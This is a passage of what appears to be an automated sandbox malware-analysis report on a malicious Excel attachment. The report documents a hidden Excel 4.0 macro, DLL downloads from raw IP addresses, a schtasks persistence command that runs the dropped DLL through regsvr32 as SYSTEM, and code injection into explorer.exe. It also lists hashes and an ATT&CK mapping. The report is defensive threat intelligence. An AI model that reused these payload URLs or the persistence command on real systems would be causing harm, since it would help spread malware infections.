    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002202C push es; ret 12_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10021C96 pushad ; iretd 12_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 12_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026105 push edi; ret 12_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002514B pushad ; iretd 12_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,4_2_10012AEC
    Source: Fiosa2.der.23.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa.der.6.drStatic PE information: real checksum: 0x7af7b should be: 0xfeba5
    Source: Fiosa.der.17.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa1.der.14.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7

    Persistence and Installation Behavior:

    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].dat

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.der
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15

    Hooking and other Techniques for Hiding and Protection:

    Overwrites code with unconditional jumps - possibly settings hooks in foreign process
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: 25102D value: E9 BA 4C E7 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: 25102D value: E9 BA 4C E7 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: 25102D value: E9 BA 4C E3 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: 25102D value: E9 BA 4C E3 FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: Claim-680517779-09242021.xlsStream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2600Thread sleep count: 46 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2032Thread sleep time: -148000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2832Thread sleep count: 50 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 408Thread sleep count: 49 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 668Thread sleep count: 48 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 380Thread sleep count: 49 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 380Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2300Thread sleep count: 53 > 30
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-11362
    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-12469
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].dat
    Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-11417
    Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-10090
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,4_2_1000D01F
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,4_2_1000AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000CAEB4 FindFirstFileW,FindNextFileW,6_2_000CAEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,14_2_000CAEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,17_2_0008AEB4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,4_2_10005F82
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,4_2_10012AEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10029660 GetProcessHeap,RtlAllocateHeap,4_2_10029660
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1007792E mov eax, dword ptr fs:[00000030h]4_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1007785D mov eax, dword ptr fs:[00000030h]4_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10077464 push dword ptr fs:[00000030h]4_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007792E mov eax, dword ptr fs:[00000030h]9_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007785D mov eax, dword ptr fs:[00000030h]9_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10077464 push dword ptr fs:[00000030h]9_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007792E mov eax, dword ptr fs:[00000030h]12_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007785D mov eax, dword ptr fs:[00000030h]12_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10077464 push dword ptr fs:[00000030h]12_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007792E mov eax, dword ptr fs:[00000030h]16_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007785D mov eax, dword ptr fs:[00000030h]16_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_10077464 push dword ptr fs:[00000030h]16_2_10077464
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000C5A61 RtlAddVectoredExceptionHandler,6_2_000C5A61
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00085A61 RtlAddVectoredExceptionHandler,17_2_00085A61

    HIPS / PFW / Operating System Protection Evasion:

    Maps a DLL or memory area into another process
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regions
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Allocates memory in foreign processes
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: F0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: 25102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: F0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: 25102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: 25102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: 25102D value: E9
    Yara detected hidden Macro 4.0 in Excel
    Source: Yara matchFile source: Claim-680517779-09242021.xls, type: SAMPLE
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmp | Binary or memory string: !Progman
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000C31C2 CreateNamedPipeA,6_2_000C31C2
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,4_2_1000980C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,4_2_1000D01F

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Command and Scripting Interpreter 11 | Scheduled Task/Job 1 | Process Injection 413 | Masquerading 121 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Scripting 2 | Logon Script (Windows) | Logon Script (Windows) | Modify Registry 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | Native API 3 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Exploitation for Client Execution 32 | Network Logon Script | Network Logon Script | Process Injection 413 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 2 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 11 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

    Behavior Graph

    [Behavior graph image not preserved. Behavior Graph ID: 489833; Sample: Claim-680517779-09242021.xls; Start date: 24/09/2021; Architecture: WINDOWS; Score: 100]

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    Claim-680517779-09242021.xls | 0% | Virustotal | | Browse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    http://190.14.37.173/44463.6668827546.dat | 0% | Avira URL Cloud | safe |
    http://www.%s.comPA | 0% | URL Reputation | safe |
    http://51.89.115.111/44463.6668827546.dat | 0% | Avira URL Cloud | safe |
    http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
    http://111.90.148.104/44463.6668827546.dat | 0% | Avira URL Cloud | safe |

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://190.14.37.173/44463.6668827546.dat | false | Avira URL Cloud: safe | unknown
    http://51.89.115.111/44463.6668827546.dat | false | Avira URL Cloud: safe | unknown
    http://111.90.148.104/44463.6668827546.dat | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.%s.comPA | regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmp | false | URL Reputation: safe | low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmp | false | | high
    http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.518300285.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.515596084.0000000001DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575010843.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574000225.0000000001EB0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.583955951.00000000008E0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.581362480.0000000000A50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

      Contacted IPs

      Public

      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      190.14.37.173 | unknown | Panama | | 52469 | OffshoreRacksSAPA | false
      51.89.115.111 | unknown | France | | 16276 | OVHFR | false
      111.90.148.104 | unknown | Malaysia | | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | false

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:489833
      Start date:24.09.2021
      Start time:15:58:36
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 14m 25s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Claim-680517779-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/11@0/3
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 24% (good quality ratio 22.7%)
      • Quality average: 77.1%
      • Quality standard deviation: 27.2%
      HCA Information:
      • Successful, ratio: 87%
      • Number of executed functions: 142
      • Number of non-executed functions: 92
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
      • Not all processes were analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      Time | Type | Description
      16:01:08 | API Interceptor | 54x Sleep call for process: regsvr32.exe modified
      16:01:09 | API Interceptor | 877x Sleep call for process: explorer.exe modified
      16:01:11 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
      16:01:12 | Task Scheduler | Run new task: xtirgcvnp path: regsvr32.exe s>-s "C:\Users\user\Fiosa.der"

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN


      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.25439646164881
      Encrypted:false
      SSDEEP:1536:C6PLrFNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:C6NNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:C8BEF55152E43CAEAD2B8C29CBBBE84F
      SHA1:B1F25C1F0ECB6A09B68CC97ABCB41D1036743F87
      SHA-256:3A84BBB00ABFD27B981444C5033645C62C753547B4C98D72BC0F5FE4D7FE69CD
      SHA-512:2ABFBE651ECF320481C66FCBA37487B40CF9CA39524D59C8E9292723FF0DE8F9FB19A35F3FB4FB3EFB9C6E39911D26AAF09D3BFAC25221BF0AF24346DBEA4F45
      Malicious:false
      C:\Users\user\Fiosa.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      C:\Users\user\Fiosa1.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      C:\Users\user\Fiosa2.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.3741485480829125
      Encrypted:false
      SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
      MD5:15C440CEBA523F1FA008FAA03D09AC99
      SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
      SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
      SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
      Malicious:true
      Reputation:unknown

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
      Entropy (8bit):7.828790165256729
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Claim-680517779-09242021.xls
      File size:419328
      MD5:a5e00f88df7d7fc328f759cd99bcd3a0
      SHA1:b81aa5364f1fe9950dd0816082e9e2c7dcfa2375
      SHA256:a2e451f2873b727520bef058f84303de9991e4353aa5ed3589350b7ce6e92506
      SHA512:7a42c57506c748f6421f7b1006fd64d8c15575f34dca123f0f8028a5887353a20cc60b0637858bf40cb5a47a0c7472d07902f2d3820c71b4decaa10abe18a7bc
      SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwx:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/xr

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Claim-680517779-09242021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-24 09:05:02
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm1, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1
      VBA File Name:UserForm1
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      Attribute VB_Name = "UserForm1"
      Attribute VB_Base = "0{6E2E223A-A629-4255-BA17-B75486DE444A}{A668B021-7649-4DE4-8D02-89E3EA2CFA2A}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
